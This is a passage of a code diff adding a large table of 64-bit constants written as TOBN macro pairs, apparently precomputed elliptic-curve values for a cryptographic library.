+     TOBN(0x4f8a4689, 0xe56ddfbd), TOBN(0xea1b0c07, 0xfe32983a),
+     TOBN(0x2b317462, 0x873cb8cb), TOBN(0x658deddc, 0x2d93229f),
+     TOBN(0x65efaf4d, 0x0f64ef58), TOBN(0xfe43287d, 0x730cc7a8),
+     TOBN(0xaebc0c72, 0x3d047d70), TOBN(0x92efa539, 0xd92d26c9),
+     TOBN(0x06e78457, 0x94b56526), TOBN(0x415cb80f, 0x0961002d),
+     TOBN(0x89e5c565, 0x76dcb10f), TOBN(0x8bbb6982, 0xff9259fe),
+     TOBN(0x4fe8795b, 0x9abc2668), TOBN(0xb5d4f534, 0x1e678fb1),
+     TOBN(0x6601f3be, 0x7b7da2b9), TOBN(0x98da59e2, 0xa13d6805),
+     TOBN(0x190d8ea6, 0x01799a52), TOBN(0xa20cec41, 0xb86d2952),
+     TOBN(0x3062ffb2, 0x7fff2a7c), TOBN(0x741b32e5, 0x79f19d37),
+     TOBN(0xf80d8181, 0x4eb57d47), TOBN(0x7a2d0ed4, 0x16aef06b),
+     TOBN(0x09735fb0, 0x1cecb588), TOBN(0x1641caaa, 0xc6061f5b)}
+    ,
+    {TOBN(0x7f99824f, 0x20151427), TOBN(0x206828b6, 0x92430206),
+     TOBN(0xaa9097d7, 0xe1112357), TOBN(0xacf9a2f2, 0x09e414ec),
+     TOBN(0xdbdac9da, 0x27915356), TOBN(0x7e0734b7, 0x001efee3),
+     TOBN(0x54fab5bb, 0xd2b288e2), TOBN(0x4c630fc4, 0xf62dd09c),
+     TOBN(0x8537107a, 0x1ac2703b), TOBN(0xb49258d8, 0x6bc857b5),
+     TOBN(0x57df14de, 0xbcdaccd1), TOBN(0x24ab68d7, 0xc4ae8529),
+     TOBN(0x7ed8b5d4, 0x734e59d0), TOBN(0x5f8740c8, 0xc495cc80),
+     TOBN(0x84aedd5a, 0x291db9b3), TOBN(0x80b360f8, 0x4fb995be),
+     TOBN(0xae915f5d, 0x5fa067d1), TOBN(0x4134b57f, 0x9668960c),
+     TOBN(0xbd3656d6, 0xa48edaac), TOBN(0xdac1e3e4, 0xfc1d7436),
+     TOBN(0x674ff869, 0xd81fbb26), TOBN(0x449ed3ec, 0xb26c33d4),
+     TOBN(0x85138705, 0xd94203e8), TOBN(0xccde538b, 0xbeeb6f4a),
+     TOBN(0x55d5c68d, 0xa61a76fa), TOBN(0x598b441d, 0xca1554dc),
+     TOBN(0xd39923b9, 0x773b279c), TOBN(0x33331d3c, 0x36bf9efc),
+     TOBN(0x2d4c848e, 0x298de399), TOBN(0xcfdb8e77, 0xa1a27f56),
+     TOBN(0x94c855ea, 0x57b8ab70), TOBN(0xdcdb9dae, 0x6f7879ba),
+     TOBN(0x7bdff8c2, 0x019f2a59), TOBN(0xb3ce5bb3, 0xcb4fbc74),
+     TOBN(0xea907f68, 0x8a9173dd), TOBN(0x6cd3d0d3, 0x95a75439),
+     TOBN(0x92ecc4d6, 0xefed021c), TOBN(0x09a9f9b0, 0x6a77339a),
+     TOBN(0x87ca6b15, 0x7188c64a), TOBN(0x10c29968, 0x44899158),
+     TOBN(0x5859a229, 0xed6e82ef), TOBN(0x16f338e3, 0x65ebaf4e),
+     TOBN(0x0cd31387, 0x5ead67ae), TOBN(0x1c73d228, 0x54ef0bb4),
+     TOBN(0x4cb55131, 0x74a5c8c7), TOBN(0x01cd2970, 0x7f69ad6a),
+     TOBN(0xa04d00dd, 0xe966f87e), TOBN(0xd96fe447, 0x0b7b0321),
+     TOBN(0x342ac06e, 0x88fbd381), TOBN(0x02cd4a84, 0x5c35a493),
+     TOBN(0xe8fa89de, 0x54f1bbcd), TOBN(0x341d6367, 0x2575ed4c),
+     TOBN(0xebe357fb, 0xd238202b), TOBN(0x600b4d1a, 0xa984ead9),
+     TOBN(0xc35c9f44, 0x52436ea0), TOBN(0x96fe0a39, 0xa370751b),
+     TOBN(0x4c4f0736, 0x7f636a38), TOBN(0x9f943fb7, 0x0e76d5cb),
+     TOBN(0xb03510ba, 0xa8b68b8b), TOBN(0xc246780a, 0x9ed07a1f),
+     TOBN(0x3c051415, 0x6d549fc2), TOBN(0xc2953f31, 0x607781ca),
+     TOBN(0x955e2c69, 0xd8d95413), TOBN(0xb300fadc, 0x7bd282e3),
+     TOBN(0x81fe7b50, 0x87e9189f), TOBN(0xdb17375c, 0xf42dda27),
+     TOBN(0x22f7d896, 0xcf0a5904), TOBN(0xa0e57c5a, 0xebe348e6),
+     TOBN(0xa61011d3, 0xf40e3c80), TOBN(0xb1189321, 0x8db705c5),
+     TOBN(0x4ed9309e, 0x50fedec3), TOBN(0xdcf14a10, 0x4d6d5c1d),
+     TOBN(0x056c265b, 0x55691342), TOBN(0xe8e08504, 0x91049dc7),
+     TOBN(0x131329f5, 0xc9bae20a), TOBN(0x96c8b3e8, 0xd9dccdb4),
+     TOBN(0x8c5ff838, 0xfb4ee6b4), TOBN(0xfc5a9aeb, 0x41e8ccf0),
+     TOBN(0x7417b764, 0xfae050c6), TOBN(0x0953c3d7, 0x00452080),
+     TOBN(0x21372682, 0x38dfe7e8), TOBN(0xea417e15, 0x2bb79d4b),
+     TOBN(0x59641f1c, 0x76e7cf2d), TOBN(0x271e3059, 0xea0bcfcc),
+     TOBN(0x624c7dfd, 0x7253ecbd), TOBN(0x2f552e25, 0x4fca6186),
+     TOBN(0xcbf84ecd, 0x4d866e9c), TOBN(0x73967709, 0xf68d4610),
+     TOBN(0xa14b1163, 0xc27901b4), TOBN(0xfd9236e0, 0x899b8bf3),
+     TOBN(0x42b091ec, 0xcbc6da0a), TOBN(0xbb1dac6f, 0x5ad1d297),
+     TOBN(0x80e61d53, 0xa91cf76e), TOBN(0x4110a412, 0xd31f1ee7),
+     TOBN(0x2d87c3ba, 0x13efcf77), TOBN(0x1f374bb4, 0xdf450d76),
+     TOBN(0x5e78e2f2, 0x0d188dab), TOBN(0xe3968ed0, 0xf4b885ef),
+     TOBN(0x46c0568e, 0x7314570f), TOBN(0x31616338, 0x01170521),
+     TOBN(0x18e1e7e2, 0x4f0c8afe), TOBN(0x4caa75ff, 0xdeea78da),
+     TOBN(0x82db67f2, 0x7c5d8a51), TOBN(0x36a44d86, 0x6f505370),
+     TOBN(0xd72c5bda, 0x0333974f), TOBN(0x5db516ae, 0x27a70146),
+     TOBN(0x34705281, 0x210ef921), TOBN(0xbff17a8f, 0x0c9c38e5),
+     TOBN(0x78f4814e, 0x12476da1), TOBN(0xc1e16613, 0x33c16980),
+     TOBN(0x9e5b386f, 0x424d4bca), TOBN(0x4c274e87, 0xc85740de),
+     TOBN(0xb6a9b88d, 0x6c2f5226), TOBN(0x14d1b944, 0x550d7ca8),
+     TOBN(0x580c85fc, 0x1fc41709), TOBN(0xc1da368b, 0x54c6d519),
+     TOBN(0x2b0785ce, 0xd5113cf7), TOBN(0x0670f633, 0x5a34708f),
+     TOBN(0x46e23767, 0x15cc3f88), TOBN(0x1b480cfa, 0x50c72c8f),
+     TOBN(0x20288602, 0x4147519a), TOBN(0xd0981eac, 0x26b372f0),
+     TOBN(0xa9d4a7ca, 0xa785ebc8), TOBN(0xd953c50d, 0xdbdf58e9),
+     TOBN(0x9d6361cc, 0xfd590f8f), TOBN(0x72e9626b, 0x44e6c917),
+     TOBN(0x7fd96110, 0x22eb64cf), TOBN(0x863ebb7e, 0x9eb288f3),
+     TOBN(0x6e6ab761, 0x6aca8ee7), TOBN(0x97d10b39, 0xd7b40358),
+     TOBN(0x1687d377, 0x1e5feb0d), TOBN(0xc83e50e4, 0x8265a27a),
+     TOBN(0x8f75a9fe, 0xc954b313), TOBN(0xcc2e8f47, 0x310d1f61),
+     TOBN(0xf5ba81c5, 0x6557d0e0), TOBN(0x25f9680c, 0x3eaf6207),
+     TOBN(0xf95c6609, 0x4354080b), TOBN(0x5225bfa5, 0x7bf2fe1c),
+     TOBN(0xc5c004e2, 0x5c7d98fa), TOBN(0x3561bf1c, 0x019aaf60),
+     TOBN(0x5e6f9f17, 0xba151474), TOBN(0xdec2f934, 0xb04f6eca),
+     TOBN(0x64e368a1, 0x269acb1e), TOBN(0x1332d9e4, 0x0cdda493),
+     TOBN(0x60d6cf69, 0xdf23de05), TOBN(0x66d17da2, 0x009339a0),
+     TOBN(0x9fcac985, 0x0a693923), TOBN(0xbcf057fc, 0xed7c6a6d),
+     TOBN(0xc3c5c8c5, 0xf0b5662c), TOBN(0x25318dd8, 0xdcba4f24),
+     TOBN(0x60e8cb75, 0x082b69ff), TOBN(0x7c23b3ee, 0x1e728c01),
+     TOBN(0x15e10a0a, 0x097e4403), TOBN(0xcb3d0a86, 0x19854665),
+     TOBN(0x88d8e211, 0xd67d4826), TOBN(0xb39af66e, 0x0b9d2839),
+     TOBN(0xa5f94588, 0xbd475ca8), TOBN(0xe06b7966, 0xc077b80b),
+     TOBN(0xfedb1485, 0xda27c26c), TOBN(0xd290d33a, 0xfe0fd5e0),
+     TOBN(0xa40bcc47, 0xf34fb0fa), TOBN(0xb4760cc8, 0x1fb1ab09),
+     TOBN(0x8fca0993, 0xa273bfe3), TOBN(0x13e4fe07, 0xf70b213c),
+     TOBN(0x3bcdb992, 0xfdb05163), TOBN(0x8c484b11, 0x0c2b19b6),
+     TOBN(0x1acb815f, 0xaaf2e3e2), TOBN(0xc6905935, 0xb89ff1b4),
+     TOBN(0xb2ad6f9d, 0x586e74e1), TOBN(0x488883ad, 0x67b80484),
+     TOBN(0x758aa2c7, 0x369c3ddb), TOBN(0x8ab74e69, 0x9f9afd31),
+     TOBN(0x10fc2d28, 0x5e21beb1), TOBN(0x3484518a, 0x318c42f9),
+     TOBN(0x377427dc, 0x53cf40c3), TOBN(0x9de0781a, 0x391bc1d9),
+     TOBN(0x8faee858, 0x693807e1), TOBN(0xa3865327, 0x4e81ccc7),
+     TOBN(0x02c30ff2, 0x6f835b84), TOBN(0xb604437b, 0x0d3d38d4),
+     TOBN(0xb3fc8a98, 0x5ca1823d), TOBN(0xb82f7ec9, 0x03be0324),
+     TOBN(0xee36d761, 0xcf684a33), TOBN(0x5a01df0e, 0x9f29bf7d),
+     TOBN(0x686202f3, 0x1306583d), TOBN(0x05b10da0, 0x437c622e),
+     TOBN(0xbf9aaa0f, 0x076a7bc8), TOBN(0x25e94efb, 0x8f8f4e43),
+     TOBN(0x8a35c9b7, 0xfa3dc26d), TOBN(0xe0e5fb93, 0x96ff03c5),
+     TOBN(0xa77e3843, 0xebc394ce), TOBN(0xcede6595, 0x8361de60),
+     TOBN(0xd27c22f6, 0xa1993545), TOBN(0xab01cc36, 0x24d671ba),
+     TOBN(0x63fa2877, 0xa169c28e), TOBN(0x925ef904, 0x2eb08376),
+     TOBN(0x3b2fa3cf, 0x53aa0b32), TOBN(0xb27beb5b, 0x71c49d7a),
+     TOBN(0xb60e1834, 0xd105e27f), TOBN(0xd6089788, 0x4f68570d),
+     TOBN(0x23094ce0, 0xd6fbc2ac), TOBN(0x738037a1, 0x815ff551),
+     TOBN(0xda73b1bb, 0x6bef119c), TOBN(0xdcf6c430, 0xeef506ba),
+     TOBN(0x00e4fe7b, 0xe3ef104a), TOBN(0xebdd9a2c, 0x0a065628),
+     TOBN(0x853a81c3, 0x8792043e), TOBN(0x22ad6ece, 0xb3b59108),
+     TOBN(0x9fb813c0, 0x39cd297d), TOBN(0x8ec7e16e, 0x05bda5d9),
+     TOBN(0x2834797c, 0x0d104b96), TOBN(0xcc11a2e7, 0x7c511510),
+     TOBN(0x96ca5a53, 0x96ee6380), TOBN(0x054c8655, 0xcea38742),
+     TOBN(0xb5946852, 0xd54dfa7d), TOBN(0x97c422e7, 0x1f4ab207),
+     TOBN(0xbf907509, 0x0c22b540), TOBN(0x2cde42aa, 0xb7c267d4),
+     TOBN(0xba18f9ed, 0x5ab0d693), TOBN(0x3ba62aa6, 0x6e4660d9),
+     TOBN(0xb24bf97b, 0xab9ea96a), TOBN(0x5d039642, 0xe3b60e32),
+     TOBN(0x4e6a4506, 0x7c4d9bd5), TOBN(0x666c5b9e, 0x7ed4a6a4),
+     TOBN(0xfa3fdcd9, 0x8edbd7cc), TOBN(0x4660bb87, 0xc6ccd753),
+     TOBN(0x9ae90820, 0x21e6b64f), TOBN(0x8a56a713, 0xb36bfb3f),
+     TOBN(0xabfce096, 0x5726d47f), TOBN(0x9eed01b2, 0x0b1a9a7f),
+     TOBN(0x30e9cad4, 0x4eb74a37), TOBN(0x7b2524cc, 0x53e9666d),
+     TOBN(0x6a29683b, 0x8f4b002f), TOBN(0xc2200d7a, 0x41f4fc20),
+     TOBN(0xcf3af47a, 0x3a338acc), TOBN(0x6539a4fb, 0xe7128975),
+     TOBN(0xcec31c14, 0xc33c7fcf), TOBN(0x7eb6799b, 0xc7be322b),
+     TOBN(0x119ef4e9, 0x6646f623), TOBN(0x7b7a26a5, 0x54d7299b),
+     TOBN(0xcb37f08d, 0x403f46f2), TOBN(0x94b8fc43, 0x1a0ec0c7),
+     TOBN(0xbb8514e3, 0xc332142f), TOBN(0xf3ed2c33, 0xe80d2a7a),
+     TOBN(0x8d2080af, 0xb639126c), TOBN(0xf7b6be60, 0xe3553ade),
+     TOBN(0x3950aa9f, 0x1c7e2b09), TOBN(0x847ff958, 0x6410f02b),
+     TOBN(0x877b7cf5, 0x678a31b0), TOBN(0xd50301ae, 0x3998b620),
+     TOBN(0x734257c5, 0xc00fb396), TOBN(0xf9fb18a0, 0x04e672a6),
+     TOBN(0xff8bd8eb, 0xe8758851), TOBN(0x1e64e4c6, 0x5d99ba44),
+     TOBN(0x4b8eaedf, 0x7dfd93b7), TOBN(0xba2f2a98, 0x04e76b8c),
+     TOBN(0x7d790cba, 0xe8053433), TOBN(0xc8e725a0, 0x3d2c9585),
+     TOBN(0x58c5c476, 0xcdd8f5ed), TOBN(0xd106b952, 0xefa9fe1d),
+     TOBN(0x3c5c775b, 0x0eff13a9), TOBN(0x242442ba, 0xe057b930),
+     TOBN(0xe9f458d4, 0xc9b70cbd), TOBN(0x69b71448, 0xa3cdb89a),
+     TOBN(0x41ee46f6, 0x0e2ed742), TOBN(0x573f1045, 0x40067493),
+     TOBN(0xb1e154ff, 0x9d54c304), TOBN(0x2ad0436a, 0x8d3a7502),
+     TOBN(0xee4aaa2d, 0x431a8121), TOBN(0xcd38b3ab, 0x886f11ed),
+     TOBN(0x57d49ea6, 0x034a0eb7), TOBN(0xd2b773bd, 0xf7e85e58),
+     TOBN(0x4a559ac4, 0x9b5c1f14), TOBN(0xc444be1a, 0x3e54df2b),
+     TOBN(0x13aad704, 0xeda41891), TOBN(0xcd927bec, 0x5eb5c788),
+     TOBN(0xeb3c8516, 0xe48c8a34), TOBN(0x1b7ac812, 0x4b546669),
+     TOBN(0x1815f896, 0x594df8ec), TOBN(0x87c6a79c, 0x79227865),
+     TOBN(0xae02a2f0, 0x9b56ddbd), TOBN(0x1339b5ac, 0x8a2f1cf3),
+     TOBN(0xf2b569c7, 0x839dff0d), TOBN(0xb0b9e864, 0xfee9a43d),
+     TOBN(0x4ff8ca41, 0x77bb064e), TOBN(0x145a2812, 0xfd249f63),
+     TOBN(0x3ab7beac, 0xf86f689a), TOBN(0x9bafec27, 0x01d35f5e),
+     TOBN(0x28054c65, 0x4265aa91), TOBN(0xa4b18304, 0x035efe42),
+     TOBN(0x6887b0e6, 0x9639dec7), TOBN(0xf4b8f6ad, 0x3d52aea5),
+     TOBN(0xfb9293cc, 0x971a8a13), TOBN(0x3f159e5d, 0x4c934d07),
+     TOBN(0x2c50e9b1, 0x09acbc29), TOBN(0x08eb65e6, 0x7154d129),
+     TOBN(0x4feff589, 0x30b75c3e), TOBN(0x0bb82fe2, 0x94491c93),
+     TOBN(0xd8ac377a, 0x89af62bb), TOBN(0xd7b51490, 0x9685e49f),
+     TOBN(0xabca9a7b, 0x04497f19), TOBN(0x1b35ed0a, 0x1a7ad13f),
+     TOBN(0x6b601e21, 0x3ec86ed6), TOBN(0xda91fcb9, 0xce0c76f1),
+     TOBN(0x9e28507b, 0xd7ab27e1), TOBN(0x7c19a555, 0x63945b7b),
+     TOBN(0x6b43f0a1, 0xaafc9827), TOBN(0x443b4fbd, 0x3aa55b91),
+     TOBN(0x962b2e65, 0x6962c88f), TOBN(0x139da8d4, 0xce0db0ca),
+     TOBN(0xb93f05dd, 0x1b8d6c4f), TOBN(0x779cdff7, 0x180b9824),
+     TOBN(0xbba23fdd, 0xae57c7b7), TOBN(0x345342f2, 0x1b932522),
+     TOBN(0xfd9c80fe, 0x556d4aa3), TOBN(0xa03907ba, 0x6525bb61),
+     TOBN(0x38b010e1, 0xff218933), TOBN(0xc066b654, 0xaa52117b),
+     TOBN(0x8e141920, 0x94f2e6ea), TOBN(0x66a27dca, 0x0d32f2b2),
+     TOBN(0x69c7f993, 0x048b3717), TOBN(0xbf5a989a, 0xb178ae1c),
+     TOBN(0x49fa9058, 0x564f1d6b), TOBN(0x27ec6e15, 0xd31fde4e),
+     TOBN(0x4cce0373, 0x7276e7fc), TOBN(0x64086d79, 0x89d6bf02),
+     TOBN(0x5a72f046, 0x4ccdd979), TOBN(0x909c3566, 0x47775631),
+     TOBN(0x1c07bc6b, 0x75dd7125), TOBN(0xb4c6bc97, 0x87a0428d),
+     TOBN(0x507ece52, 0xfdeb6b9d), TOBN(0xfca56512, 0xb2c95432),
+     TOBN(0x15d97181, 0xd0e8bd06), TOBN(0x384dd317, 0xc6bb46ea),
+     TOBN(0x5441ea20, 0x3952b624), TOBN(0xbcf70dee, 0x4e7dc2fb),
+     TOBN(0x372b016e, 0x6628e8c3), TOBN(0x07a0d667, 0xb60a7522),
+     TOBN(0xcf05751b, 0x0a344ee2), TOBN(0x0ec09a48, 0x118bdeec),
+     TOBN(0x6e4b3d4e, 0xd83dce46), TOBN(0x43a6316d, 0x99d2fc6e),
+     TOBN(0xa99d8989, 0x56cf044c), TOBN(0x7c7f4454, 0xae3e5fb7),
+     TOBN(0xb2e6b121, 0xfbabbe92), TOBN(0x281850fb, 0xe1330076),
+     TOBN(0x093581ec, 0x97890015), TOBN(0x69b1dded, 0x75ff77f5),
+     TOBN(0x7cf0b18f, 0xab105105), TOBN(0x953ced31, 0xa89ccfef),
+     TOBN(0x3151f85f, 0xeb914009), TOBN(0x3c9f1b87, 0x88ed48ad),
+     TOBN(0xc9aba1a1, 0x4a7eadcb), TOBN(0x928e7501, 0x522e71cf),
+     TOBN(0xeaede727, 0x3a2e4f83), TOBN(0x467e10d1, 0x1ce3bbd3),
+     TOBN(0xf3442ac3, 0xb955dcf0), TOBN(0xba96307d, 0xd3d5e527),
+     TOBN(0xf763a10e, 0xfd77f474), TOBN(0x5d744bd0, 0x6a6e1ff0),
+     TOBN(0xd287282a, 0xa777899e), TOBN(0xe20eda8f, 0xd03f3cde),
+     TOBN(0x6a7e75bb, 0x50b07d31), TOBN(0x0b7e2a94, 0x6f379de4),
+     TOBN(0x31cb64ad, 0x19f593cf), TOBN(0x7b1a9e4f, 0x1e76ef1d),
+     TOBN(0xe18c9c9d, 0xb62d609c), TOBN(0x439bad6d, 0xe779a650),
+     TOBN(0x219d9066, 0xe032f144), TOBN(0x1db632b8, 0xe8b2ec6a),
+     TOBN(0xff0d0fd4, 0xfda12f78), TOBN(0x56fb4c2d, 0x2a25d265),
+     TOBN(0x5f4e2ee1, 0x255a03f1), TOBN(0x61cd6af2, 0xe96af176),
+     TOBN(0xe0317ba8, 0xd068bc97), TOBN(0x927d6bab, 0x264b988e),
+     TOBN(0xa18f07e0, 0xe90fb21e), TOBN(0x00fd2b80, 0xbba7fca1),
+     TOBN(0x20387f27, 0x95cd67b5), TOBN(0x5b89a4e7, 0xd39707f7),
+     TOBN(0x8f83ad3f, 0x894407ce), TOBN(0xa0025b94, 0x6c226132),
+     TOBN(0xc79563c7, 0xf906c13b), TOBN(0x5f548f31, 0x4e7bb025),
+     TOBN(0x2b4c6b8f, 0xeac6d113), TOBN(0xa67e3f9c, 0x0e813c76),
+     TOBN(0x3982717c, 0x3fe1f4b9), TOBN(0x58865819, 0x26d8050e),
+     TOBN(0x99f3640c, 0xf7f06f20), TOBN(0xdc610216, 0x2a66ebc2),
+     TOBN(0x52f2c175, 0x767a1e08), TOBN(0x05660e1a, 0x5999871b),
+     TOBN(0x6b0f1762, 0x6d3c4693), TOBN(0xf0e7d627, 0x37ed7bea),
+     TOBN(0xc51758c7, 0xb75b226d), TOBN(0x40a88628, 0x1f91613b),
+     TOBN(0x889dbaa7, 0xbbb38ce0), TOBN(0xe0404b65, 0xbddcad81),
+     TOBN(0xfebccd3a, 0x8bc9671f), TOBN(0xfbf9a357, 0xee1f5375),
+     TOBN(0x5dc169b0, 0x28f33398), TOBN(0xb07ec11d, 0x72e90f65),
+     TOBN(0xae7f3b4a, 0xfaab1eb1), TOBN(0xd970195e, 0x5f17538a),
+     TOBN(0x52b05cbe, 0x0181e640), TOBN(0xf5debd62, 0x2643313d),
+     TOBN(0x76148154, 0x5df31f82), TOBN(0x23e03b33, 0x3a9e13c5),
+     TOBN(0xff758949, 0x4fde0c1f), TOBN(0xbf8a1abe, 0xe5b6ec20),
+     TOBN(0x702278fb, 0x87e1db6c), TOBN(0xc447ad7a, 0x35ed658f),
+     TOBN(0x48d4aa38, 0x03d0ccf2), TOBN(0x80acb338, 0x819a7c03),
+     TOBN(0x9bc7c89e, 0x6e17cecc), TOBN(0x46736b8b, 0x03be1d82),
+     TOBN(0xd65d7b60, 0xc0432f96), TOBN(0xddebe7a3, 0xdeb5442f),
+     TOBN(0x79a25307, 0x7dff69a2), TOBN(0x37a56d94, 0x02cf3122),
+     TOBN(0x8bab8aed, 0xf2350d0a), TOBN(0x13c3f276, 0x037b0d9a),
+     TOBN(0xc664957c, 0x44c65cae), TOBN(0x88b44089, 0xc2e71a88),
+     TOBN(0xdb88e5a3, 0x5cb02664), TOBN(0x5d4c0bf1, 0x8686c72e),
+     TOBN(0xea3d9b62, 0xa682d53e), TOBN(0x9b605ef4, 0x0b2ad431),
+     TOBN(0x71bac202, 0xc69645d0), TOBN(0xa115f03a, 0x6a1b66e7),
+     TOBN(0xfe2c563a, 0x158f4dc4), TOBN(0xf715b3a0, 0x4d12a78c),
+     TOBN(0x8f7f0a48, 0xd413213a), TOBN(0x2035806d, 0xc04becdb),
+     TOBN(0xecd34a99, 0x5d8587f5), TOBN(0x4d8c3079, 0x9f6d3a71),
+     TOBN(0x1b2a2a67, 0x8d95a8f6), TOBN(0xc58c9d7d, 0xf2110d0d),
+     TOBN(0xdeee81d5, 0xcf8fba3f), TOBN(0xa42be3c0, 0x0c7cdf68),
+     TOBN(0x2126f742, 0xd43b5eaa), TOBN(0x054a0766, 0xdfa59b85),
+     TOBN(0x9d0d5e36, 0x126bfd45), TOBN(0xa1f8fbd7, 0x384f8a8f),
+     TOBN(0x317680f5, 0xd563fccc), TOBN(0x48ca5055, 0xf280a928),
+     TOBN(0xe00b81b2, 0x27b578cf), TOBN(0x10aad918, 0x2994a514),
+     TOBN(0xd9e07b62, 0xb7bdc953), TOBN(0x9f0f6ff2, 0x5bc086dd),
+     TOBN(0x09d1ccff, 0x655eee77), TOBN(0x45475f79, 0x5bef7df1),
+     TOBN(0x3faa28fa, 0x86f702cc), TOBN(0x92e60905, 0x0f021f07),
+     TOBN(0xe9e62968, 0x7f8fa8c6), TOBN(0xbd71419a, 0xf036ea2c),
+     TOBN(0x171ee1cc, 0x6028da9a), TOBN(0x5352fe1a, 0xc251f573),
+     TOBN(0xf8ff236e, 0x3fa997f4), TOBN(0xd831b6c9, 0xa5749d5f),
+     TOBN(0x7c872e1d, 0xe350e2c2), TOBN(0xc56240d9, 0x1e0ce403),
+     TOBN(0xf9deb077, 0x6974f5cb), TOBN(0x7d50ba87, 0x961c3728),
+     TOBN(0xd6f89426, 0x5a3a2518), TOBN(0xcf817799, 0xc6303d43),
+     TOBN(0x510a0471, 0x619e5696), TOBN(0xab049ff6, 0x3a5e307b),
+     TOBN(0xe4cdf9b0, 0xfeb13ec7), TOBN(0xd5e97117, 0x9d8ff90c),
+     TOBN(0xf6f64d06, 0x9afa96af), TOBN(0x00d0bf5e, 0x9d2012a2),
+     TOBN(0xe63f301f, 0x358bcdc0), TOBN(0x07689e99, 0x0a9d47f8),
+     TOBN(0x1f689e2f, 0x4f43d43a), TOBN(0x4d542a16, 0x90920904),
+     TOBN(0xaea293d5, 0x9ca0a707), TOBN(0xd061fe45, 0x8ac68065),
+     TOBN(0x1033bf1b, 0x0090008c), TOBN(0x29749558, 0xc08a6db6),
+     TOBN(0x74b5fc59, 0xc1d5d034), TOBN(0xf712e9f6, 0x67e215e0),
+     TOBN(0xfd520cbd, 0x860200e6), TOBN(0x0229acb4, 0x3ea22588),
+     TOBN(0x9cd1e14c, 0xfff0c82e), TOBN(0x87684b62, 0x59c69e73),
+     TOBN(0xda85e61c, 0x96ccb989), TOBN(0x2d5dbb02, 0xa3d06493),
+     TOBN(0xf22ad33a, 0xe86b173c), TOBN(0xe8e41ea5, 0xa79ff0e3),
+     TOBN(0x01d2d725, 0xdd0d0c10), TOBN(0x31f39088, 0x032d28f9),
+     TOBN(0x7b3f71e1, 0x7829839e), TOBN(0x0cf691b4, 0x4502ae58),
+     TOBN(0xef658dbd, 0xbefc6115), TOBN(0xa5cd6ee5, 0xb3ab5314),
+     TOBN(0x206c8d7b, 0x5f1d2347), TOBN(0x794645ba, 0x4cc2253a),
+     TOBN(0xd517d8ff, 0x58389e08), TOBN(0x4fa20dee, 0x9f847288),
+     TOBN(0xeba072d8, 0xd797770a), TOBN(0x7360c91d, 0xbf429e26),
+     TOBN(0x7200a3b3, 0x80af8279), TOBN(0x6a1c9150, 0x82dadce3),
+     TOBN(0x0ee6d3a7, 0xc35d8794), TOBN(0x042e6558, 0x0356bae5),
+     TOBN(0x9f59698d, 0x643322fd), TOBN(0x9379ae15, 0x50a61967),
+     TOBN(0x64b9ae62, 0xfcc9981e), TOBN(0xaed3d631, 0x6d2934c6),
+     TOBN(0x2454b302, 0x5e4e65eb), TOBN(0xab09f647, 0xf9950428)}
+    ,
+    {TOBN(0xb2083a12, 0x22248acc), TOBN(0x1f6ec0ef, 0x3264e366),
+     TOBN(0x5659b704, 0x5afdee28), TOBN(0x7a823a40, 0xe6430bb5),
+     TOBN(0x24592a04, 0xe1900a79), TOBN(0xcde09d4a, 0xc9ee6576),
+     TOBN(0x52b6463f, 0x4b5ea54a), TOBN(0x1efe9ed3, 0xd3ca65a7),
+     TOBN(0xe27a6dbe, 0x305406dd), TOBN(0x8eb7dc7f, 0xdd5d1957),
+     TOBN(0xf54a6876, 0x387d4d8f), TOBN(0x9c479409, 0xc7762de4),
+     TOBN(0xbe4d5b5d, 0x99b30778), TOBN(0x25380c56, 0x6e793682),
+     TOBN(0x602d37f3, 0xdac740e3), TOBN(0x140deabe, 0x1566e4ae),
+     TOBN(0x4481d067, 0xafd32acf), TOBN(0xd8f0fcca, 0xe1f71ccf),
+     TOBN(0xd208dd0c, 0xb596f2da), TOBN(0xd049d730, 0x9aad93f9),
+     TOBN(0xc79f263d, 0x42ab580e), TOBN(0x09411bb1, 0x23f707b4),
+     TOBN(0x8cfde1ff, 0x835e0eda), TOBN(0x72707490, 0x90f03402),
+     TOBN(0xeaee6126, 0xc49a861e), TOBN(0x024f3b65, 0xe14f0d06),
+     TOBN(0x51a3f1e8, 0xc69bfc17), TOBN(0xc3c3a8e9, 0xa7686381),
+     TOBN(0x3400752c, 0xb103d4c8), TOBN(0x02bc4613, 0x9218b36b),
+     TOBN(0xc67f75eb, 0x7651504a), TOBN(0xd6848b56, 0xd02aebfa),
+     TOBN(0xbd9802e6, 0xc30fa92b), TOBN(0x5a70d96d, 0x9a552784),
+     TOBN(0x9085c4ea, 0x3f83169b), TOBN(0xfa9423bb, 0x06908228),
+     TOBN(0x2ffebe12, 0xfe97a5b9), TOBN(0x85da6049, 0x71b99118),
+     TOBN(0x9cbc2f7f, 0x63178846), TOBN(0xfd96bc70, 0x9153218e),
+     TOBN(0x958381db, 0x1782269b), TOBN(0xae34bf79, 0x2597e550),
+     TOBN(0xbb5c6064, 0x5f385153), TOBN(0x6f0e96af, 0xe3088048),
+     TOBN(0xbf6a0215, 0x77884456), TOBN(0xb3b5688c, 0x69310ea7),
+     TOBN(0x17c94295, 0x04fad2de), TOBN(0xe020f0e5, 0x17896d4d),
+     TOBN(0x730ba0ab, 0x0976505f), TOBN(0x567f6813, 0x095e2ec5),
+     TOBN(0x47062010, 0x6331ab71), TOBN(0x72cfa977, 0x41d22b9f),
+     TOBN(0x33e55ead, 0x8a2373da), TOBN(0xa8d0d5f4, 0x7ba45a68),
+     TOBN(0xba1d8f9c, 0x03029d15), TOBN(0x8f34f1cc, 0xfc55b9f3),
+     TOBN(0xcca4428d, 0xbbe5a1a9), TOBN(0x8187fd5f, 0x3126bd67),
+     TOBN(0x0036973a, 0x48105826), TOBN(0xa39b6663, 0xb8bd61a0),
+     TOBN(0x6d42deef, 0x2d65a808), TOBN(0x4969044f, 0x94636b19),
+     TOBN(0xf611ee47, 0xdd5d564c), TOBN(0x7b2f3a49, 0xd2873077),
+     TOBN(0x94157d45, 0x300eb294), TOBN(0x2b2a656e, 0x169c1494),
+     TOBN(0xc000dd76, 0xd3a47aa9), TOBN(0xa2864e4f, 0xa6243ea4),
+     TOBN(0x82716c47, 0xdb89842e), TOBN(0x12dfd7d7, 0x61479fb7),
+     TOBN(0x3b9a2c56, 0xe0b2f6dc), TOBN(0x46be862a, 0xd7f85d67),
+     TOBN(0x03b0d8dd, 0x0f82b214), TOBN(0x460c34f9, 0xf103cbc6),
+     TOBN(0xf32e5c03, 0x18d79e19), TOBN(0x8b8888ba, 0xa84117f8),
